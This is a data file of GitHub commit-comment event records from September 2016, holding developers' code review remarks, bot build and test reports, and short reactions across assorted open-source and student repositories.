{"id":"4614549855","type":"CommitCommentEvent","actor":{"login":"tonihele"},"repo":{"name":"tonihele/OpenKeeper"},"payload":{"comment":{"id":19164161,"position":92,"line":92,"path":"src/toniarts/openkeeper/world/room/control/RoomAudioControl.java","commit_id":"e91fa3cfac885d16b532ccb8ce8ee68f94aa1f19","created_at":"2016-09-25T16:51:36Z","updated_at":"2016-09-25T16:51:36Z","body":"http://ghk.h-cdn.co/assets/cm/15/11/640x480/54ffe5266025c-dog1.jpg"}},"created_at":"2016-09-25T16:51:36Z"}
{"id":"4614550941","type":"CommitCommentEvent","actor":{"login":"DimonLuk"},"repo":{"name":"School143/TurnirRepo"},"payload":{"comment":{"id":19164162,"position":null,"line":null,"path":null,"commit_id":"99b4794d30453faccf270290fbe61431c89c3973","created_at":"2016-09-25T16:52:18Z","updated_at":"2016-09-25T16:52:18Z","body":"TUi"}},"created_at":"2016-09-25T16:52:18Z"}
{"id":"4614551698","type":"CommitCommentEvent","actor":{"login":"Jawshy"},"repo":{"name":"2factorauth/twofactorauth"},"payload":{"comment":{"id":19164163,"position":5,"line":65,"path":"_data/education.yml","commit_id":"05e0065721d35bc6c6106e64d6d7812d15d48005","created_at":"2016-09-25T16:52:46Z","updated_at":"2016-09-25T16:52:46Z","body":":japanese_goblin: "}},"created_at":"2016-09-25T16:52:46Z"}
{"id":"4614552945","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19164166,"position":null,"line":null,"path":null,"commit_id":"f27c6a14d20df5fed421cb335adde3de994298d1","created_at":"2016-09-25T16:53:42Z","updated_at":"2016-09-25T16:53:42Z","body":"\nBuild report #162595969 for sha f27c6a14d20df5fed421cb335adde3de994298d1:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-13.84%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-3755%20/%2010048%20%2837.37%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-36.86%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/more_documentation/)\n      "}},"created_at":"2016-09-25T16:53:42Z"}
{"id":"4614554130","type":"CommitCommentEvent","actor":{"login":"ArchDemons"},"repo":{"name":"tonihele/OpenKeeper"},"payload":{"comment":{"id":19164169,"position":92,"line":92,"path":"src/toniarts/openkeeper/world/room/control/RoomAudioControl.java","commit_id":"e91fa3cfac885d16b532ccb8ce8ee68f94aa1f19","created_at":"2016-09-25T16:54:30Z","updated_at":"2016-09-25T16:54:30Z","body":"positional - maybe. We can put sound source in center of room. But directional - is to hard :). "}},"created_at":"2016-09-25T16:54:30Z"}
{"id":"4614554664","type":"CommitCommentEvent","actor":{"login":"nammafunteam"},"repo":{"name":"nammafunteam/nammarepository"},"payload":{"comment":{"id":19164171,"position":null,"line":null,"path":null,"commit_id":"d3682313ee561bd967cbf8772e57adac7794ec4d","created_at":"2016-09-25T16:54:51Z","updated_at":"2016-09-25T16:54:51Z","body":"comment on push 1"}},"created_at":"2016-09-25T16:54:51Z"}
{"id":"4614554917","type":"CommitCommentEvent","actor":{"login":"toxicFork"},"repo":{"name":"webpack/webpack-dev-middleware"},"payload":{"comment":{"id":19164172,"position":null,"line":null,"path":null,"commit_id":"e8962937b537d8b080c5939b6c04fbeb9d5277fe","created_at":"2016-09-25T16:55:01Z","updated_at":"2016-09-25T16:55:01Z","body":"@SpaceK33z confirming that it works for me!"}},"created_at":"2016-09-25T16:55:01Z"}
{"id":"4614555510","type":"CommitCommentEvent","actor":{"login":"inspiringcoder"},"repo":{"name":"inspiringcoder/practice"},"payload":{"comment":{"id":19164176,"position":1,"line":1,"path":"README.md","commit_id":"b57674f9888841217d59be9486b9730d25b8dd21","created_at":"2016-09-25T16:55:27Z","updated_at":"2016-09-25T16:55:27Z","body":"echo \"# mind\" >> README.md\r\ngit init\r\ngit add README.md\r\ngit commit -m \"first commit\"\r\ngit remote add origin https://github.com/inspiringcoder/mind.git\r\ngit push -u origin master"}},"created_at":"2016-09-25T16:55:27Z"}
{"id":"4614558913","type":"CommitCommentEvent","actor":{"login":"Carlgo11"},"repo":{"name":"2factorauth/twofactorauth"},"payload":{"comment":{"id":19164188,"position":5,"line":65,"path":"_data/education.yml","commit_id":"05e0065721d35bc6c6106e64d6d7812d15d48005","created_at":"2016-09-25T16:57:51Z","updated_at":"2016-09-25T16:57:51Z","body":":open_mouth: "}},"created_at":"2016-09-25T16:57:51Z"}
{"id":"4614559414","type":"CommitCommentEvent","actor":{"login":"bjourne"},"repo":{"name":"factor/factor"},"payload":{"comment":{"id":19164191,"position":null,"line":null,"path":null,"commit_id":"c02d9135797b1f4c3f4b4fda5c6826e2cb17ff4f","created_at":"2016-09-25T16:58:12Z","updated_at":"2016-09-25T16:58:12Z","body":"Ah, now I see it too. It seems to lose 5% or so."}},"created_at":"2016-09-25T16:58:12Z"}
{"id":"4614562042","type":"CommitCommentEvent","actor":{"login":"KhaledaNYC"},"repo":{"name":"KhaledaNYC/react-this-props-children-lab-web-0716"},"payload":{"comment":{"id":19164197,"position":null,"line":null,"path":null,"commit_id":"fe46d58f8a5f629eb6ba1b1b3f160e8e6bdb968b","created_at":"2016-09-25T17:00:08Z","updated_at":"2016-09-25T17:00:08Z","body":"I need to do this one over.  Copied the solution because my soln was not working."}},"created_at":"2016-09-25T17:00:08Z"}
{"id":"4614565208","type":"CommitCommentEvent","actor":{"login":"Jawshy"},"repo":{"name":"2factorauth/twofactorauth"},"payload":{"comment":{"id":19164202,"position":null,"line":null,"path":null,"commit_id":"6d5e6a6cce98f60cd3b11609cec4e874c7d192a4","created_at":"2016-09-25T17:01:55Z","updated_at":"2016-09-25T17:01:55Z","body":":clap: "}},"created_at":"2016-09-25T17:01:55Z"}
{"id":"4614566691","type":"CommitCommentEvent","actor":{"login":"mik-laj"},"repo":{"name":"jakowaty/bip.siecobywatelska.pl"},"payload":{"comment":{"id":19164208,"position":33,"line":33,"path":"src/NewsModuleBundle/DataFixtures/ORM/LoadNewsData.php","commit_id":"5f15e26dccb8fb79b4b1df33048b90b3480b6d16","created_at":"2016-09-25T17:02:55Z","updated_at":"2016-09-25T17:02:55Z","body":"Czyli to jest w sumie %6?\r\n````js\r\nnew Array(20).fill(0).map((t,i)=> i).filter(d => (d % 2 ==0 && d % 3 == 0)) \r\n// Array [ 0, 6, 12, 18 ]\r\n```` \r\ni możesz dużego ifa zastąpić przez małego lub wcale \r\n````php\r\n$oneNews->setPinned($x % 6 == 0? true: false); \r\n````\r\n````php\r\n$oneNews->setPinned($x % 6 == 0); \r\n````"}},"created_at":"2016-09-25T17:02:55Z"}
{"id":"4614567670","type":"CommitCommentEvent","actor":{"login":"craigemery"},"repo":{"name":"craigemery/vim-autotag"},"payload":{"comment":{"id":19164211,"position":26,"line":24,"path":"plugin/autotag.vim","commit_id":"9550755752c25997795d1134af8a87f739e1b0b6","created_at":"2016-09-25T17:03:32Z","updated_at":"2016-09-25T17:03:32Z","body":"I'm clearly only using Python 3 atm to test.\n\n\nOn 25/09/2016 08:48, Jonatan wrote:\n>\n> That looks a little off to me (*future -> __future* and \n> print_statement -> print_function)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/craigemery/vim-autotag/commit/9550755752c25997795d1134af8a87f739e1b0b6#commitcomment-19162894>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AAFtPdbb7tkzcIj9uTfoeLPKMvw4N4dhks5qtiddgaJpZM4KF2HA>.\n>\n\n-- \nCraig Emery <https://uk.linkedin.com/in/emerycraig?trk=profile-badge>\n"}},"created_at":"2016-09-25T17:03:32Z"}
{"id":"4614567893","type":"CommitCommentEvent","actor":{"login":"caseyrollins"},"repo":{"name":"CenterForOpenScience/osf.io"},"payload":{"comment":{"id":19164212,"position":null,"line":null,"path":null,"commit_id":"acbec71253a17c879872a8d9de856d2a50b0fe7c","created_at":"2016-09-25T17:03:43Z","updated_at":"2016-09-25T17:03:43Z","body":"Fixed in dbfec77af0423200c4b44657ddf34f3764c3fc4a"}},"created_at":"2016-09-25T17:03:43Z"}
{"id":"4614571393","type":"CommitCommentEvent","actor":{"login":"ariel-"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19164225,"position":338,"line":6540,"path":"src/server/game/Spells/Auras/SpellAuraEffects.cpp","commit_id":"1c1ef5673329a6a3ffdfb9ce4838a76a9eeede0e","created_at":"2016-09-25T17:06:08Z","updated_at":"2016-09-25T17:06:08Z","body":"Oh, so that was it. I diff'd the unit.cpp function doing the same and made this modification thinking it was an oversight."}},"created_at":"2016-09-25T17:06:08Z"}
{"id":"4614573147","type":"CommitCommentEvent","actor":{"login":"varun-k2"},"repo":{"name":"posabsolute/jQuery-Validation-Engine"},"payload":{"comment":{"id":19164234,"position":null,"line":null,"path":null,"commit_id":"863793cb3697d3778554ab415e38e38374ce7cb3","created_at":"2016-09-25T17:07:22Z","updated_at":"2016-09-25T17:07:22Z","body":"This link will help also go through the select examples and make sure you are using right classes\r\nhttp://stackoverflow.com/questions/4364291/jquery-validate-select-box\r\n"}},"created_at":"2016-09-25T17:07:22Z"}
{"id":"4614573219","type":"CommitCommentEvent","actor":{"login":"harley"},"repo":{"name":"PrimeTimeTran/blog"},"payload":{"comment":{"id":19164236,"position":24,"line":22,"path":"app/views/layouts/application.html.erb","commit_id":"525d41daa4717ecf1cab495149c59b94cca016b6","created_at":"2016-09-25T17:07:25Z","updated_at":"2016-09-25T17:07:25Z","body":"why are you doing this? this would try to load `all.css` which doesn't exist"}},"created_at":"2016-09-25T17:07:25Z"}
{"id":"4614573526","type":"CommitCommentEvent","actor":{"login":"Serg-Norseman"},"repo":{"name":"Serg-Norseman/GEDKeeper"},"payload":{"comment":{"id":19164238,"position":103,"line":259,"path":"projects/GEDKeeper2/Externals/RusDeclension.cs","commit_id":"240cc89fe9efe94708157d7773903118d3345893","created_at":"2016-09-25T17:07:37Z","updated_at":"2016-09-25T17:07:37Z","body":"It's original source, from me - only minor changes 😄  Long lines... can be carried later"}},"created_at":"2016-09-25T17:07:37Z"}
{"id":"4614574831","type":"CommitCommentEvent","actor":{"login":"pdsouza"},"repo":{"name":"maruos/manifest"},"payload":{"comment":{"id":19164242,"position":null,"line":null,"path":null,"commit_id":"52c4979992d7fad58387b0303a0fbcaa434c70d0","created_at":"2016-09-25T17:08:32Z","updated_at":"2016-09-25T17:08:32Z","body":"Perhaps a temporary error from Google's git servers? I am able to sync\nhttps://android.googlesource.com/platform/external/easymock.git just fine.\n\nOn Sun, Sep 25, 2016, 4:13 AM Mitch Davis <notifications@github.com> wrote:\n\n> I keep trying to sync the manifest but I am getting errors with the\n> following:\n>\n> fatal: Not a git repository:\n> '/home/mitch/android/system/.repo/projects/external/easymock.git'\n> fatal: Not a git repository:\n> '/home/mitch/android/system/.repo/projects/external/easymock.git'\n> error: Cannot fetch platform/external/easymock\n>\n> error: Exited sync due to fetch errors\n>\n> What am I missing?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/maruos/manifest/commit/52c4979992d7fad58387b0303a0fbcaa434c70d0#commitcomment-19162919>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AATGcmLogE8yPyKYUrU9VQCnzB3GCCAfks5qti0rgaJpZM4KF2V5>\n> .\n>\n"}},"created_at":"2016-09-25T17:08:32Z"}
{"id":"4614576266","type":"CommitCommentEvent","actor":{"login":"harley"},"repo":{"name":"PrimeTimeTran/blog"},"payload":{"comment":{"id":19164244,"position":null,"line":null,"path":null,"commit_id":"0655d0cdc22504ca93bbf70fe6ddd3a60d3487fb","created_at":"2016-09-25T17:09:31Z","updated_at":"2016-09-25T17:09:31Z","body":"good. consider changing `\"page:change\"` to `\"page:load ready\"` per documentation [here](www.rubydoc.info/gems/turbolinks/2.5.3)"}},"created_at":"2016-09-25T17:09:31Z"}
{"id":"4614578144","type":"CommitCommentEvent","actor":{"login":"ariel-"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19164249,"position":null,"line":null,"path":null,"commit_id":"1c1ef5673329a6a3ffdfb9ce4838a76a9eeede0e","created_at":"2016-09-25T17:10:39Z","updated_at":"2016-09-25T17:10:39Z","body":"This needs another kind of work for 6.x, many spells changed (ids removed, mechanics changed) and that's why they needed script conversion."}},"created_at":"2016-09-25T17:10:39Z"}
{"id":"4614579406","type":"CommitCommentEvent","actor":{"login":"PrimeTimeTran"},"repo":{"name":"PrimeTimeTran/blog"},"payload":{"comment":{"id":19164251,"position":24,"line":22,"path":"app/views/layouts/application.html.erb","commit_id":"525d41daa4717ecf1cab495149c59b94cca016b6","created_at":"2016-09-25T17:11:30Z","updated_at":"2016-09-25T17:11:30Z","body":"Sometimes when I'm experimenting and bugging I copy and paste the code in and just play around with it to get a feel for it.\r\n\r\nI never took a class for Javascript, Rails, or Ruby in a classroom so still have a lot to learn. lol =(! \r\n"}},"created_at":"2016-09-25T17:11:30Z"}
{"id":"4614580124","type":"CommitCommentEvent","actor":{"login":"erh16"},"repo":{"name":"erh16/ProjektTym"},"payload":{"comment":{"id":19164255,"position":2,"line":2,"path":"README.md","commit_id":"aac47e801ddf9d0b83a2fd5295a9c6454a3aac5d","created_at":"2016-09-25T17:11:58Z","updated_at":"2016-09-25T17:11:58Z","body":"test"}},"created_at":"2016-09-25T17:11:58Z"}
{"id":"4614581492","type":"CommitCommentEvent","actor":{"login":"PrimeTimeTran"},"repo":{"name":"PrimeTimeTran/blog"},"payload":{"comment":{"id":19164264,"position":24,"line":22,"path":"app/views/layouts/application.html.erb","commit_id":"525d41daa4717ecf1cab495149c59b94cca016b6","created_at":"2016-09-25T17:12:58Z","updated_at":"2016-09-25T17:12:58Z","body":"The other day I was experimenting trying to figure out why my CSS wasn't loading properly so I played around with it a bit. lol =)\r\n"}},"created_at":"2016-09-25T17:12:58Z"}
{"id":"4614581496","type":"CommitCommentEvent","actor":{"login":"asadoughi"},"repo":{"name":"leedtan/nn-python"},"payload":{"comment":{"id":19164265,"position":5,"line":5,"path":"nn_helper.py","commit_id":"6a1792e1c2fb3f431aa8bbf75542ec3aa759e689","created_at":"2016-09-25T17:12:58Z","updated_at":"2016-09-25T17:12:58Z","body":"I'd recommend a style where constants are uppercase."}},"created_at":"2016-09-25T17:12:58Z"}
{"id":"4614582519","type":"CommitCommentEvent","actor":{"login":"YELLOWJACKET1212"},"repo":{"name":"YELLOWJACKET1212/back-at-ya"},"payload":{"comment":{"id":19164270,"position":null,"line":null,"path":null,"commit_id":"c306a2f9f66679da02bdba010199a1e33b6ce6f3","created_at":"2016-09-25T17:13:41Z","updated_at":"2016-09-25T17:13:41Z","body":"I'm josh and very interested in thia program"}},"created_at":"2016-09-25T17:13:41Z"}
{"id":"4614583172","type":"CommitCommentEvent","actor":{"login":"belhard-user"},"repo":{"name":"belhard-user/group4"},"payload":{"comment":{"id":19164272,"position":null,"line":null,"path":null,"commit_id":"5d17fb05f53d82de4515599a8891c1f75352c2ec","created_at":"2016-09-25T17:14:09Z","updated_at":"2016-09-25T17:14:09Z","body":"Ой ничего не понятно"}},"created_at":"2016-09-25T17:14:09Z"}
{"id":"4614583997","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19164276,"position":null,"line":null,"path":null,"commit_id":"e37e09cd8e3f3695fd6c95ef7faaabf2659e34ab","created_at":"2016-09-25T17:14:44Z","updated_at":"2016-09-25T17:14:44Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2304 of 2496 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e37e09cd8e3f3695fd6c95ef7faaabf2659e34ab-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e37e09cd8e3f3695fd6c95ef7faaabf2659e34ab-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.31%25-yellow.svg)</a> \n"}},"created_at":"2016-09-25T17:14:44Z"}
{"id":"4614585484","type":"CommitCommentEvent","actor":{"login":"MiguelMadero"},"repo":{"name":"toranb/ember-redux-ddau-example"},"payload":{"comment":{"id":19164285,"position":34,"line":35,"path":"app/router.js","commit_id":"76dfce3956a508724ed958142e2fe4bc85167d5a","created_at":"2016-09-25T17:15:46Z","updated_at":"2016-09-25T17:15:46Z","body":"minor/later: instead of reopening the Router and using a name that may clash and may, consider using a routing-service to subscribe to `routerDidTransition`. See https://github.com/emberjs/rfcs/pull/95 and an implementation I have used on https://gist.github.com/MiguelMadero/3cd0cd4e8559335c73d412835e36c2e6"}},"created_at":"2016-09-25T17:15:46Z"}
{"id":"4614588581","type":"CommitCommentEvent","actor":{"login":"pauljohanneskraft"},"repo":{"name":"pauljohanneskraft/Math"},"payload":{"comment":{"id":19164292,"position":null,"line":null,"path":null,"commit_id":"59ed20cc77a0c03f1e250c96e16bcf6690d6db81","created_at":"2016-09-25T17:18:02Z","updated_at":"2016-09-25T17:18:02Z","body":"of course not included but fixed ever-repeating primeFactors"}},"created_at":"2016-09-25T17:18:02Z"}
{"id":"4614589083","type":"CommitCommentEvent","actor":{"login":"dcerimagic"},"repo":{"name":"fairheadcreative/eplexity"},"payload":{"comment":{"id":19164294,"position":null,"line":null,"path":null,"commit_id":"1eae3a955fdcb9826b770a7ebcdd258bc5831589","created_at":"2016-09-25T17:18:23Z","updated_at":"2016-09-25T17:18:23Z","body":"Usage correction: the check is performed using an URI parameter AWS (&AWS=true) - DO NOT put in AWS=false!"}},"created_at":"2016-09-25T17:18:23Z"}
{"id":"4614590568","type":"CommitCommentEvent","actor":{"login":"abcdefg30"},"repo":{"name":"OpenRA/OpenRA"},"payload":{"comment":{"id":19164299,"position":39,"line":115,"path":"mods/ra/rules/ships.yaml","commit_id":"86ad7576cefa51e7fcb1042af546b703bed2b002","created_at":"2016-09-25T17:19:31Z","updated_at":"2016-09-25T17:19:31Z","body":"I guess this shouldn't be commited."}},"created_at":"2016-09-25T17:19:31Z"}
{"id":"4614591414","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19164304,"position":null,"line":null,"path":null,"commit_id":"e37e09cd8e3f3695fd6c95ef7faaabf2659e34ab","created_at":"2016-09-25T17:20:05Z","updated_at":"2016-09-25T17:20:05Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e37e09cd8e3f3695fd6c95ef7faaabf2659e34ab-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-25T17:20:05Z"}
{"id":"4614591778","type":"CommitCommentEvent","actor":{"login":"hudokkow"},"repo":{"name":"AchimTuran/xbmc"},"payload":{"comment":{"id":19164306,"position":4,"line":44,"path":"project/cmake/scripts/common/AddonHelpers.cmake","commit_id":"8295db89387dcd643994798e7815b576215ceeee","created_at":"2016-09-25T17:20:19Z","updated_at":"2016-09-25T17:20:19Z","body":"Sorry it took so long to look at this.\r\nWhat do you mean with \"... I wasn't able to include that file in AddonHelpers.cmake\"?\r\n\r\nAll you need is <code>include(${CORE_SOURCE_DIR}/project/cmake/scripts/common/Macros.cmake)</code> on the file you need to call <code>source_group_by_folder(...)</code>\r\n\r\nDidn't that work for you?"}},"created_at":"2016-09-25T17:20:19Z"}
{"id":"4614592977","type":"CommitCommentEvent","actor":{"login":"Lillecarl"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":19164308,"position":null,"line":null,"path":null,"commit_id":"adceff998158c4a075a3ca19f0143dc2fe35adee","created_at":"2016-09-25T17:21:05Z","updated_at":"2016-09-25T17:21:05Z","body":"What does this fix?"}},"created_at":"2016-09-25T17:21:05Z"}
{"id":"4614593787","type":"CommitCommentEvent","actor":{"login":"felixboehm"},"repo":{"name":"Kawohl/c-"},"payload":{"comment":{"id":19164309,"position":null,"line":null,"path":null,"commit_id":"2282e512ba17e7c3fd997886d1fb86c52b0d3cb6","created_at":"2016-09-25T17:21:39Z","updated_at":"2016-09-25T17:21:39Z","body":"Good work til here, keep going!"}},"created_at":"2016-09-25T17:21:39Z"}
{"id":"4614597266","type":"CommitCommentEvent","actor":{"login":"ebeshero"},"repo":{"name":"jonhoranic/theGraveyard"},"payload":{"comment":{"id":19164316,"position":null,"line":null,"path":null,"commit_id":"4b94ef5ff22978b6045c1d97317d6daf89028786","created_at":"2016-09-25T17:24:11Z","updated_at":"2016-09-25T17:24:11Z","body":"It's very effective markup on an old style interface! But is there an opening tag to go with it?"}},"created_at":"2016-09-25T17:24:11Z"}
{"id":"4614600400","type":"CommitCommentEvent","actor":{"login":"craigpaul"},"repo":{"name":"laravel/laravel"},"payload":{"comment":{"id":19164354,"position":null,"line":null,"path":null,"commit_id":"76db1006cca54f0364b313bef604ac59c5f9b1f0","created_at":"2016-09-25T17:26:25Z","updated_at":"2016-09-25T17:26:25Z","body":"@neindk I think you might be having different problems, just tested that out with vue-resource 1.0.3, vue 1.0.27 and Laravel 5.3.10 without a single problem. When I console.log `request.headers` after the `.set()` call, I saw the following.\r\n\r\n```\r\nmap : {\r\n    Accept : Array[1]\r\n    X-CSRF-TOKEN : Array[1]\r\n        0:\"WaoYWv1Lz1yGUZW3W4Q4br0TNciRjGHjveHpfMSS\"\r\n    X-Requested-With : Array[1]\r\n}\r\n```\r\n\r\nThat tell's me it's being set properly and there were no errors with the response either."}},"created_at":"2016-09-25T17:26:25Z"}
{"id":"4614601158","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19164355,"position":29,"line":0,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T17:26:59Z","updated_at":"2016-09-25T17:26:59Z","body":"Oh I think you are mistaken. The program will still run without the canSolve method. It just won't do what you want it to. You can't run the program without the main method though. "}},"created_at":"2016-09-25T17:26:59Z"}
{"id":"4614601708","type":"CommitCommentEvent","actor":{"login":"aaryllins"},"repo":{"name":"aaryllins/html-validation-fixes"},"payload":{"comment":{"id":19164356,"position":null,"line":null,"path":null,"commit_id":"98641fd3169f6bfdd72971879eebcb0cc84bff49","created_at":"2016-09-25T17:27:22Z","updated_at":"2016-09-25T17:27:22Z","body":"Website is still offline, and I can't figure out how to fix it. I have synced all of my commits. Forking appears to have been completed properly.\r\n\r\nAll other tasks have been successfully completed.\r\n\r\n@thomasjbradley"}},"created_at":"2016-09-25T17:27:22Z"}
{"id":"4614602670","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19164358,"position":null,"line":null,"path":null,"commit_id":"02414899f263bffd7b00ef6b090993cededea284","created_at":"2016-09-25T17:28:03Z","updated_at":"2016-09-25T17:28:03Z","body":"The [API Reference](http://support.screeps.com/hc/en-us/articles/203084991-API-Reference) has a full list of (very useful) constants."}},"created_at":"2016-09-25T17:28:03Z"}
{"id":"4614604224","type":"CommitCommentEvent","actor":{"login":"Lillecarl"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":19164359,"position":null,"line":null,"path":null,"commit_id":"06b7cd6f3c0690ef3d7518afb5662287ab74706b","created_at":"2016-09-25T17:29:09Z","updated_at":"2016-09-25T17:29:09Z","body":"When we're just doing iterators and such, could we not just use auto? Since it's C++ standard by now :)"}},"created_at":"2016-09-25T17:29:09Z"}
{"id":"4614606347","type":"CommitCommentEvent","actor":{"login":"darkleaf"},"repo":{"name":"maximtop/check-guess-clj"},"payload":{"comment":{"id":19164361,"position":18,"line":18,"path":"src/check_score_clj/core.clj","commit_id":"3acd5fb36b5a41898a0d62da71f8bd269a41f5a1","created_at":"2016-09-25T17:30:39Z","updated_at":"2016-09-25T17:30:39Z","body":"Проверять как оно работает ты должен в тестах."}},"created_at":"2016-09-25T17:30:39Z"}
{"id":"4614607866","type":"CommitCommentEvent","actor":{"login":"harshavardhana"},"repo":{"name":"donatello/minio"},"payload":{"comment":{"id":19164362,"position":144,"line":366,"path":"cmd/bucket-notification-handlers.go","commit_id":"d3491812a0dad00a5dcc37df3739047d908ba598","created_at":"2016-09-25T17:31:40Z","updated_at":"2016-09-25T17:31:40Z","body":"You are right they have to be differentiated."}},"created_at":"2016-09-25T17:31:40Z"}
{"id":"4614609616","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19164365,"position":null,"line":null,"path":null,"commit_id":"31d4cb7a1ae9bc4b19354acd6621e1f216d53eb3","created_at":"2016-09-25T17:32:45Z","updated_at":"2016-09-25T17:32:45Z","body":"Patch passed STC with 0 ELO, I submitted to LTC with priority -1. I will let it to -1 until Marco declares what he thinks about it.\r\n\r\nHere https://github.com/Stefano80/Stockfish/commit/155caf938a0cd58600d95ac34ab4652da97bca0e it has been argued that this could (or should) have been tested with SPRT [0, 4].\r\n\r\nI think this is a simplification since it removes 1 variable and reduces by 2 the number of degrees of freedom for the parametrization of this specific endgame. \r\n\r\nBtw, it is also almost impossible for specific endgame patches to pass SPRT [0, x] and, in my personal opinion, it would be nice if they could be removed one after the other and replace by general formulas. This could be the work of decades."}},"created_at":"2016-09-25T17:32:45Z"}
{"id":"4614611468","type":"CommitCommentEvent","actor":{"login":"DzmitrySV"},"repo":{"name":"MaximDanilov/GIIS"},"payload":{"comment":{"id":19164371,"position":null,"line":null,"path":null,"commit_id":"a861894cf8b9be88744e5b0bc12e6477b20210e5","created_at":"2016-09-25T17:34:04Z","updated_at":"2016-09-25T17:34:04Z","body":"С квадрантами? Или там уже все в 3д?"}},"created_at":"2016-09-25T17:34:04Z"}
{"id":"4614614628","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":19164389,"position":null,"line":null,"path":null,"commit_id":"06b7cd6f3c0690ef3d7518afb5662287ab74706b","created_at":"2016-09-25T17:36:21Z","updated_at":"2016-09-25T17:36:21Z","body":"yes we can and yes we do, @cyberium is just old :D"}},"created_at":"2016-09-25T17:36:21Z"}
{"id":"4614617543","type":"CommitCommentEvent","actor":{"login":"saitoha"},"repo":{"name":"mintty/mintty"},"payload":{"comment":{"id":19164402,"position":53,"line":1376,"path":"src/wintext.c","commit_id":"b2d528b7afc78167c589908613a990af0b1e641a","created_at":"2016-09-25T17:38:25Z","updated_at":"2016-09-25T17:38:25Z","body":"It seems this re-assignment statement slows down rendering performance. "}},"created_at":"2016-09-25T17:38:25Z"}
{"id":"4614617728","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":19164403,"position":null,"line":null,"path":null,"commit_id":"8662bdfa124ae3ec90d9bf88842d9cfab9a43532","created_at":"2016-09-25T17:38:31Z","updated_at":"2016-09-25T17:38:31Z","body":"Typo in the commit message, should read extract_ponder_from_tt()"}},"created_at":"2016-09-25T17:38:31Z"}
{"id":"4614618961","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19164409,"position":null,"line":null,"path":null,"commit_id":"e37e09cd8e3f3695fd6c95ef7faaabf2659e34ab","created_at":"2016-09-25T17:39:19Z","updated_at":"2016-09-25T17:39:19Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2308 of 2496 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e37e09cd8e3f3695fd6c95ef7faaabf2659e34ab-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e37e09cd8e3f3695fd6c95ef7faaabf2659e34ab-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.47%25-yellow.svg)</a> \n"}},"created_at":"2016-09-25T17:39:19Z"}
{"id":"4614619632","type":"CommitCommentEvent","actor":{"login":"ariel-"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19164412,"position":101,"line":1024,"path":"src/server/game/Spells/Auras/SpellAuraEffects.cpp","commit_id":"1c1ef5673329a6a3ffdfb9ce4838a76a9eeede0e","created_at":"2016-09-25T17:39:50Z","updated_at":"2016-09-25T17:39:50Z","body":"No. See for example spell 12311 Gag Order (Rank 1)"}},"created_at":"2016-09-25T17:39:50Z"}
